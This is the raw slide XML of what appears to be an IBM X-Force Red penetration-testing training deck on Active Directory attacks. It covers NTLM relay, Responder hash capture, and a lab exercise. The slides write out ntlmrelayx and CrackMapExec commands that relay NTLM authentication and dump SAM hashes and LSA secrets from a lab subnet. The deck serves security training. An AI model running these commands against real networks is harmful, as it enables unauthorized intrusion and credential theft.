              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ntlmrelayx.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>tf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> $target -smb2support</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buFont typeface=".AppleSystemUIFont" charset="-120"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 2" descr="NTLM Relay">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4715A423-735E-9744-9D48-E0851A06F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58" y="1758522"/>
            <a:ext cx="5002214" cy="29451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8391118-3F93-A545-86FA-975D10E0D245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436191" y="4647335"/>
            <a:ext cx="2898743" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0"/>
              <a:t>Image From: https://en.hackndo.com/ntlm-relay/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 7" descr="SMB Relay - Hacking Lab">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E87CFB-F060-144C-903F-6B970B376B2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5338072" y="1752869"/>
            <a:ext cx="3585180" cy="2943231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1162973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B514-046F-CC69-4154-5F61CAF5EC13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Initial Access &gt; No AD Access &gt; NTLM Relay </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18E9839D-9331-9C6D-A4FE-785AC5EB5E4A}"/>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68D95"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="IBM Plex Sans Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IBM Security X-Force Red / © 2020 IBM Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{473408A5-D5BB-99AA-8BBB-BF9E652F6DBD}"/>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868D95"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="IBM Plex Sans Light"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EE5BA97-3CFF-9B2B-498B-7EDBD5F81E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5420A49C-02DF-8A19-44C8-FD3CE8541C30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A white sheet with a couple of icons&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C911A82-7E8E-4E03-8C1C-2F9A1167F73B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235723" y="516697"/>
            <a:ext cx="5047167" cy="4626803"/>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F55C86EB-87EC-4BF6-A7E4-D6AB75EE1FF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235722" y="516697"/>
            <a:ext cx="5047167" cy="4626803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAAD30CA-1042-4F10-901A-D90161D8BB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235721" y="516697"/>
            <a:ext cx="5047166" cy="4626802"/>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06C98F38-E907-4107-B307-6C4FED148A47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235722" y="516697"/>
            <a:ext cx="5047165" cy="462680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81FF4431-2E0A-48F5-8B40-A85FF5940C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235723" y="516697"/>
            <a:ext cx="5047166" cy="4626802"/>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D2C98237-7D30-4EF3-8BF4-D204D6F31F58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235723" y="516696"/>
            <a:ext cx="5047164" cy="4626800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73DD96D-D179-4AB7-92C2-E88D075CC4E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235715" y="516688"/>
            <a:ext cx="5047172" cy="4626808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0DA0DD-F830-4AFE-8672-1029DFDA723D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235722" y="516697"/>
            <a:ext cx="5047163" cy="4626799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75FFACDF-B584-4C92-8382-3094734DA203}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235723" y="510160"/>
            <a:ext cx="5047162" cy="4626798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB8610D0-D387-494F-88BA-299DEC141E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235722" y="516683"/>
            <a:ext cx="5047161" cy="4626797"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 34" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE1D9BC-E81E-485E-8367-4207DD07349E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235723" y="516697"/>
            <a:ext cx="5047160" cy="4626796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81B9754D-6AD4-4B8D-850E-B1D6B1E663D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235710" y="516697"/>
            <a:ext cx="5047160" cy="4626796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42" descr="A computer screen shot of a diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930FA97D-7687-43CE-B762-0076FB3EB06B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235722" y="517283"/>
            <a:ext cx="5047147" cy="4626785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 46" descr="A computer screen shot of a diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E33602-F9BE-4C12-876B-4F106C82027E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2235696" y="503622"/>
            <a:ext cx="5047147" cy="4626785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196645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If-Admin*</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52666"/>
            <a:ext cx="8580317" cy="3272575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>If you are an admin, you can dump hashes and passwords from the Registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Passwords can be dumped with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>cme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> by adding --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> or --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>lsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> to the end of a command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-14097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172.16.14.192/26 -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>sam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>This will dump hashes of local users to the machine (NOT domain users). Could be useful for shared local administrator passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>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172.16.14.192/26 -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>lsa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Dumps LSA secrets stored in the Registry. Includes cached credentials from the domain. A more detailed explanation can be found at the link below.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-140970">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2379456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Initial Access &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="770C28"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab 2</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28</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marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Time to use Responder! (see previous slides)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Hopefully we get a hash or two!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>From here we will want to try to crack it or relay it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Can we use the access we get to get anywhere else?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>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1170505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3AC8-D532-9CD0-EFCF-AB811A3110F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145453" y="1551951"/>
            <a:ext cx="4604507" cy="1596510"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:latin typeface="IBM Plex Sans Light"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
